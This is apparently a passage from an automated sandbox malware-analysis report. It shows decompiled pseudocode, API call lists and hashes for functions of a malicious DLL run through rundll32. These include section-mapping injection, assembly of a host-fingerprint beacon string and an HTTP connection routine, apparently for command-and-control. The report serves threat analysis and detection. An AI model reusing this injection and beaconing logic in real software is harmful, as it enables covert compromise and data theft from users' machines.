					_t39 = E04893A9C(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                          0x048925e0
                                          0x048925e7
                                          0x048925e8
                                          0x048925e9
                                          0x048925ea
                                          0x048925eb
                                          0x048925fc
                                          0x04892600
                                          0x04892614
                                          0x04892617
                                          0x0489261a
                                          0x04892621
                                          0x04892624
                                          0x0489262b
                                          0x0489262e
                                          0x04892631
                                          0x04892634
                                          0x04892639
                                          0x04892674
                                          0x0489263b
                                          0x0489263e
                                          0x04892644
                                          0x04892649
                                          0x0489264d
                                          0x0489266b
                                          0x0489264f
                                          0x04892656
                                          0x04892664
                                          0x04892664
                                          0x0489264d
                                          0x0489267c

                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000,0489759F), ref: 04892634
                                            • Part of subcall function 04893A9C: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04892649,00000002,00000000,?,?,00000000,?,?,04892649,00000000), ref: 04893AC9
                                          • memset.NTDLL ref: 04892656
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID:
                                          • API String ID: 2533685722-0
                                          • Opcode ID: 599b9daad8f68b1fbb65ca1a3266e3e7e6caa9dce62654c94354c0a334a3d922
                                          • Instruction ID: 8503279221bd498887d76995600dbc5055ca8f69225f26d1813de19ed6ceb339
                                          • Opcode Fuzzy Hash: 599b9daad8f68b1fbb65ca1a3266e3e7e6caa9dce62654c94354c0a334a3d922
                                          • Instruction Fuzzy Hash: C1213BB5D0060DAFDB11DFA9C8849DEFBF9FB48344F148969E505F3610D730AA448BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B51C78 Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcAddress.KERNEL32(?), ref: 00B51CA1
                                          • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 00B51CC3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressMemory64ProcReadVirtualWow64
                                          • String ID:
                                          • API String ID: 752694512-0
                                          • Opcode ID: 3effa3e348bd43c66f1db253c63b614c617575980050713d8db325cc1560d8bf
                                          • Instruction ID: a9a64c26c45c288efe64cfe43344e1a8ba525bf397784e59acb198138617af7d
                                          • Opcode Fuzzy Hash: 3effa3e348bd43c66f1db253c63b614c617575980050713d8db325cc1560d8bf
                                          • Instruction Fuzzy Hash: FAF06D75500109FFCB028F89DC44D9EBBFAEB883007504999F908D7220DB32E9A1DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893A9C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04893A9C(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                          0x04893aae
                                          0x04893ab4
                                          0x04893ac2
                                          0x04893ac9
                                          0x04893ace
                                          0x04893ad4
                                          0x00000000
                                          0x04893ad5
                                          0x00000000

                                          APIs
                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04892649,00000002,00000000,?,?,00000000,?,?,04892649,00000000), ref: 04893AC9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction ID: 3c78cb1c4191e60aa0436619ba71b363e2355fb6121d485e501a2ebd1e0428be
                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction Fuzzy Hash: 26F082B5A0060CBFDB119FA4CC84C9FBBFCEB48354B104E39B552E1090D630AE488B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B594A5 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,00B5DE51,00000000,00000000,00B5DE51,00000000,00000002,00000000,?,?,00000000,00B5DE51,000000FF,00000000), ref: 00B594D3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                          • Instruction ID: c7c0a15c38bade611ca51baa02d9cac0888a48c7a1ce48261854347b4c4c23b6
                                          • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                          • Instruction Fuzzy Hash: 73F0FEB690020CFFEB119FA5CC85D9FBBBDEB48345B108869F542D1150D2319E199B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B65D9D Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,00B79420), ref: 00B65DB4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InformationProcessQuery
                                          • String ID:
                                          • API String ID: 1778838933-0
                                          • Opcode ID: 7a12e46de81385406117bb51a9dc433ccdf37569311cf95d112ce140b254f5ac
                                          • Instruction ID: 026649a44ff679f14298783d1ea44f99903341458e3648d7859c6fd2f99a4388
                                          • Opcode Fuzzy Hash: 7a12e46de81385406117bb51a9dc433ccdf37569311cf95d112ce140b254f5ac
                                          • Instruction Fuzzy Hash: 80F05E313005169BC720DF59CC88E9BBBF8FB05754B2141A4E905DB2A1D730ED95CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489636D Relevance: 36.2, APIs: 24, Instructions: 214memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 68%
                                          			E0489636D(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v52;
				void* __ecx;
				void* __edi;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				int _t41;
				void* _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t82;
				int _t85;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t116;

				_t103 = __edx;
				_t29 = __eax;
				_t113 = _a20;
				_v4 = 8;
				if(__eax == 0) {
					_t29 = GetTickCount();
				}
				_t30 =  *0x489a018; // 0x2682f32c
				asm("bswap eax");
				_t31 =  *0x489a014; // 0x3a87c8cd
				asm("bswap eax");
				_t32 =  *0x489a010; // 0xd8d2f808
				asm("bswap eax");
				_t33 =  *0x489a00c; // 0x8f8f86c2
				asm("bswap eax");
				_t34 =  *0x489a348; // 0x9ad5a8
				_t3 = _t34 + 0x489b633; // 0x74666f73
				_t109 = wsprintfA(_t113, _t3, 2, 0x3d173, _t33, _t32, _t31, _t30,  *0x489a02c,  *0x489a004, _t29);
				_t37 = E04893F1E();
				_t38 =  *0x489a348; // 0x9ad5a8
				_t4 = _t38 + 0x489b673; // 0x74707526
				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
				_t116 = _t114 + 0x38;
				_t110 = _t109 + _t41;
				if(_a24 != 0) {
					_t92 =  *0x489a348; // 0x9ad5a8
					_t8 = _t92 + 0x489b67e; // 0x732526
					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t95; // executed
				}
				_t42 = E04891567(_t99); // executed
				_t104 = _t42;
				if(_t104 != 0) {
					_t87 =  *0x489a348; // 0x9ad5a8
					_t10 = _t87 + 0x489b8d4; // 0x736e6426
					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t90;
					HeapFree( *0x489a2d8, 0, _t104);
				}
				_t105 = E04893268();
				if(_t105 != 0) {
					_t82 =  *0x489a348; // 0x9ad5a8
					_t12 = _t82 + 0x489b8dc; // 0x6f687726
					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t85;
					HeapFree( *0x489a2d8, 0, _t105);
				}
				_t106 =  *0x489a3cc; // 0x52495b0
				_a24 = E04895D1C(0x489a00a, _t106 + 4);
				_t46 =  *0x489a370; // 0x0
				if(_t46 != 0) {
					_t78 =  *0x489a348; // 0x9ad5a8
					_t15 = _t78 + 0x489b8b6; // 0x3d736f26
					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t81;
				}
				_t47 =  *0x489a36c; // 0x0
				if(_t47 != 0) {
					_t75 =  *0x489a348; // 0x9ad5a8
					_t17 = _t75 + 0x489b88d; // 0x3d706926
					wsprintfA(_t110 + _t113, _t17, _t47);
				}
				if(_a24 != 0) {
					_t108 = RtlAllocateHeap( *0x489a2d8, 0, 0x800);
					if(_t108 != 0) {
						E04893950(GetTickCount());
						_t54 =  *0x489a3cc; // 0x52495b0
						__imp__(_t54 + 0x40);
						asm("lock xadd [eax], ecx");
						_t58 =  *0x489a3cc; // 0x52495b0
						__imp__(_t58 + 0x40);
						_t60 =  *0x489a3cc; // 0x52495b0
						_t61 = E04893739(1, _t103, _t113,  *_t60); // executed
						_t111 = _t61;
						asm("lock xadd [eax], ecx");
						if(_t111 != 0) {
							StrTrimA(_t111, 0x489928c);
							_push(_t111);
							_t66 = E04893970();
							_a12 = _t66;
							if(_t66 != 0) {
								_t97 = __imp__;
								 *_t97(_t111, _v0);
								 *_t97(_t108, _v4);
								_t98 = __imp__;
								 *_t98(_t108, _v0);
								 *_t98(_t108, _t111);
								_t72 = E04895347(0xffffffffffffffff, _t108, _v24, _v20); // executed
								_v52 = _t72;
								if(_t72 != 0 && _t72 != 0x10d2) {
									E04893F62();
								}
								HeapFree( *0x489a2d8, 0, _v16);
							}
							HeapFree( *0x489a2d8, 0, _t111);
						}
						RtlFreeHeap( *0x489a2d8, 0, _t108); // executed
					}
					HeapFree( *0x489a2d8, 0, _a16);
				}
				RtlFreeHeap( *0x489a2d8, 0, _t113); // executed
				return _a4;
			}




















































                                          0x0489636d
                                          0x0489636d
                                          0x04896371
                                          0x04896377
                                          0x04896381
                                          0x04896383
                                          0x04896383
                                          0x04896390
                                          0x0489639b
                                          0x0489639e
                                          0x048963a9
                                          0x048963ac
                                          0x048963b1
                                          0x048963b4
                                          0x048963b9
                                          0x048963bc
                                          0x048963c8
                                          0x048963d5
                                          0x048963d7
                                          0x048963dd
                                          0x048963e2
                                          0x048963ed
                                          0x048963ef
                                          0x048963f2
                                          0x048963f9
                                          0x048963fb
                                          0x04896404
                                          0x0489640f
                                          0x04896411
                                          0x04896414
                                          0x04896414
                                          0x04896416
                                          0x0489641b
                                          0x0489641f
                                          0x04896421
                                          0x04896426
                                          0x04896432
                                          0x04896434
                                          0x04896440
                                          0x04896442
                                          0x04896442
                                          0x0489644d
                                          0x04896451
                                          0x04896453
                                          0x04896458
                                          0x04896464
                                          0x04896466
                                          0x04896472
                                          0x04896474
                                          0x04896474
                                          0x0489647a
                                          0x0489648d
                                          0x04896491
                                          0x04896498
                                          0x0489649b
                                          0x048964a0
                                          0x048964ab
                                          0x048964ad
                                          0x048964b0
                                          0x048964b0
                                          0x048964b2
                                          0x048964b9
                                          0x048964bc
                                          0x048964c1
                                          0x048964cb
                                          0x048964cd
                                          0x048964d5
                                          0x048964ee
                                          0x048964f2
                                          0x048964fe
                                          0x04896503
                                          0x0489650c
                                          0x0489651d
                                          0x04896521
                                          0x0489652a
                                          0x04896530
                                          0x04896538
                                          0x0489653d
                                          0x0489654a
                                          0x04896550
                                          0x0489655c
                                          0x04896562
                                          0x04896563
                                          0x04896568
                                          0x0489656e
                                          0x04896574
                                          0x0489657b
                                          0x04896582
                                          0x04896588
                                          0x0489658f
                                          0x04896593
                                          0x0489659e
                                          0x048965a3
                                          0x048965a9
                                          0x048965b2
                                          0x048965b2
                                          0x048965c3
                                          0x048965c3
                                          0x048965d2
                                          0x048965d2
                                          0x048965e1
                                          0x048965e1
                                          0x048965f3
                                          0x048965f3
                                          0x04896602
                                          0x04896612

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04896383
                                          • wsprintfA.USER32 ref: 048963D0
                                          • wsprintfA.USER32 ref: 048963ED
                                          • wsprintfA.USER32 ref: 0489640F
                                          • wsprintfA.USER32 ref: 04896432
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04896442
                                          • wsprintfA.USER32 ref: 04896464
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04896474
                                          • wsprintfA.USER32 ref: 048964AB
                                          • wsprintfA.USER32 ref: 048964CB
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 048964E8
                                          • GetTickCount.KERNEL32 ref: 048964F8
                                          • RtlEnterCriticalSection.NTDLL(05249570), ref: 0489650C
                                          • RtlLeaveCriticalSection.NTDLL(05249570), ref: 0489652A
                                            • Part of subcall function 04893739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7477C740,?,?,0489653D,?,052495B0), ref: 04893764
                                            • Part of subcall function 04893739: lstrlen.KERNEL32(?,?,?,0489653D,?,052495B0), ref: 0489376C
                                            • Part of subcall function 04893739: strcpy.NTDLL ref: 04893783
                                            • Part of subcall function 04893739: lstrcat.KERNEL32(00000000,?), ref: 0489378E
                                            • Part of subcall function 04893739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0489653D,?,052495B0), ref: 048937AB
                                          • StrTrimA.SHLWAPI(00000000,0489928C,?,052495B0), ref: 0489655C
                                            • Part of subcall function 04893970: lstrlen.KERNEL32(05249B90,00000000,00000000,7477C740,04896568,00000000), ref: 04893980
                                            • Part of subcall function 04893970: lstrlen.KERNEL32(?), ref: 04893988
                                            • Part of subcall function 04893970: lstrcpy.KERNEL32(00000000,05249B90), ref: 0489399C
                                            • Part of subcall function 04893970: lstrcat.KERNEL32(00000000,?), ref: 048939A7
                                          • lstrcpy.KERNEL32(00000000,?), ref: 0489657B
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04896582
                                          • lstrcat.KERNEL32(00000000,?), ref: 0489658F
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04896593
                                            • Part of subcall function 04895347: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76DC81D0), ref: 048953F9
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 048965C3
                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 048965D2
                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,052495B0), ref: 048965E1
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 048965F3
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04896602
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 1892477351-0
                                          • Opcode ID: 1fadef82fe9ab4a346923b39495ccb50eb2a0e27fc95db555076dde278fc4fc9
                                          • Instruction ID: ab4e2fc67311b075dcedb2141a8c7cb7c637bf1756c8dafe44d6ad3a3f80b6b8
                                          • Opcode Fuzzy Hash: 1fadef82fe9ab4a346923b39495ccb50eb2a0e27fc95db555076dde278fc4fc9
                                          • Instruction Fuzzy Hash: B67161B1600A41AFDB15ABA8EC48F5637E8FB48744F0C0E18F905D7260EF79ED05AB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B544CE Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 141 b544ce-b544df 142 b544e1-b544ed call b574f5 call b59a58 141->142 143 b54533-b5453e 141->143 157 b544f3-b54500 SleepEx 142->157 145 b54545-b54557 call b6d9dc 143->145 146 b54540 call b6e863 143->146 152 b54559-b54566 ReleaseMutex FindCloseChangeNotification 145->152 153 b54568-b5456f 145->153 146->145 152->153 155 b54571-b5457e ResetEvent CloseHandle 153->155 156 b54580-b5458d SleepEx 153->156 155->156 156->156 158 b5458f 156->158 157->157 159 b54502-b54509 157->159 160 b54594-b545a1 SleepEx 158->160 161 b5451f-b54531 RtlDeleteCriticalSection * 2 159->161 162 b5450b-b54511 159->162 163 b545a3-b545a8 160->163 164 b545aa-b545b1 160->164 161->143 162->161 165 b54513-b5451a call b5c6b8 162->165 163->160 163->164 166 b545b3-b545bc HeapFree 164->166 167 b545c2-b545c9 164->167 165->161 166->167 169 b545d1-b545d7 167->169 170 b545cb-b545cc call b61163 167->170 172 b545d9-b545e0 169->172 173 b545e8-b545ef 169->173 170->169 172->173 176 b545e2-b545e4 172->176 174 b545f1-b545f2 RtlRemoveVectoredExceptionHandler 173->174 175 b545f8-b545fe 173->175 174->175 177 b54605 175->177 178 b54600 call b566bb 175->178 176->173 180 b5460a-b54617 SleepEx 177->180 178->177 181 b54620-b54629 180->181 182 b54619-b5461e 180->182 183 b54641-b54651 LocalFree 181->183 184 b5462b-b54630 181->184 182->180 182->181 184->183 185 b54632 184->185 186 b54635-b5463f FindCloseChangeNotification 185->186 186->183 186->186
                                          APIs
                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00B63ED5), ref: 00B544F7
                                          • RtlDeleteCriticalSection.NTDLL(00B79400), ref: 00B5452A
                                          • RtlDeleteCriticalSection.NTDLL(00B79420), ref: 00B54531
                                          • ReleaseMutex.KERNEL32(000005AC,00000000,?,?,?,00B63ED5), ref: 00B5455A
                                          • FindCloseChangeNotification.KERNEL32(?,?,00B63ED5), ref: 00B54566
                                          • ResetEvent.KERNEL32(00000000,00000000,?,?,?,00B63ED5), ref: 00B54572
                                          • CloseHandle.KERNEL32(?,?,00B63ED5), ref: 00B5457E
                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00B63ED5), ref: 00B54584
                                          • SleepEx.KERNEL32(00000064,00000001,?,?,00B63ED5), ref: 00B54598
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B63ED5), ref: 00B545BC
                                          • RtlRemoveVectoredExceptionHandler.NTDLL(02BB05B8), ref: 00B545F2
                                          • SleepEx.KERNEL32(00000064,00000001,?,?,00B63ED5), ref: 00B5460E
                                          • FindCloseChangeNotification.KERNEL32(0614F2C8,?,?,00B63ED5), ref: 00B54637
                                          • LocalFree.KERNEL32(?,?,00B63ED5), ref: 00B54647
                                            • Part of subcall function 00B574F5: GetVersion.KERNEL32(?,?,76DDF720,?,00B544E6,00000000,?,?,?,00B63ED5), ref: 00B57519
                                            • Part of subcall function 00B574F5: GetModuleHandleA.KERNEL32(?,061497B5,?,76DDF720,?,00B544E6,00000000,?,?,?,00B63ED5), ref: 00B57536
                                            • Part of subcall function 00B574F5: GetProcAddress.KERNEL32(00000000), ref: 00B5753D
                                            • Part of subcall function 00B59A58: RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B59A62
                                            • Part of subcall function 00B59A58: RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B59A9E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                          • String ID:
                                          • API String ID: 1259384122-0
                                          • Opcode ID: ab4c6a23489f30f00f91deb231056e323ffed6d845b367d9c46a252bb1e04d6e
                                          • Instruction ID: 03f0bd13b972daa48ea0d004cf5ef36f8cdb1e2f31baf44383a5e71a9eeb43dc
                                          • Opcode Fuzzy Hash: ab4c6a23489f30f00f91deb231056e323ffed6d845b367d9c46a252bb1e04d6e
                                          • Instruction Fuzzy Hash: 8F418031700252AFDB20AF65EC89B5537E8EB10716B8500E5FA08E76A0DF71DCE4CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04897A71 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 92%
                                          			E04897A71(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E04894DF6(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E04894C73(_t56);
					} else {
						E04894C73( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04897A06) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E04893A6F( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x489a348; // 0x9ad5a8
						_t15 = _t59 + 0x489b743; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                                          0x04897a71
                                          0x04897a71
                                          0x04897a7c
                                          0x04897a83
                                          0x04897a8b
                                          0x04897a95
                                          0x04897a9b
                                          0x04897aae
                                          0x04897abe
                                          0x04897ab0
                                          0x04897ab3
                                          0x04897ab8
                                          0x04897ab8
                                          0x04897aae
                                          0x04897ace
                                          0x04897ad4
                                          0x04897ad9
                                          0x04897bc2
                                          0x00000000
                                          0x04897af4
                                          0x04897af7
                                          0x04897b0a
                                          0x04897b10
                                          0x04897b15
                                          0x04897b3d
                                          0x04897b50
                                          0x04897b5a
                                          0x04897b5d
                                          0x04897b63
                                          0x04897b68
                                          0x00000000
                                          0x00000000
                                          0x04897b6c
                                          0x04897b78
                                          0x04897b89
                                          0x04897b8b
                                          0x04897b9c
                                          0x04897b9c
                                          0x04897bac
                                          0x00000000
                                          0x04897bbe
                                          0x00000000
                                          0x04897bbe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04897b15

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,76D84D40), ref: 04897A83
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04897AA6
                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04897ACE
                                          • InternetSetStatusCallback.WININET(00000000,04897A06), ref: 04897AE5
                                          • ResetEvent.KERNEL32(?), ref: 04897AF7
                                          • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04897B0A
                                          • GetLastError.KERNEL32 ref: 04897B17
                                          • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04897B5D
                                          • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04897B7B
                                          • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04897B9C
                                          • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04897BA8
                                          • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04897BB8
                                          • GetLastError.KERNEL32 ref: 04897BC2
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                          • String ID:
                                          • API String ID: 2290446683-0
                                          • Opcode ID: c00a5eb98782da59e172fa76290a6bc5c5b26f5612bfc81c0c465bfec178f152
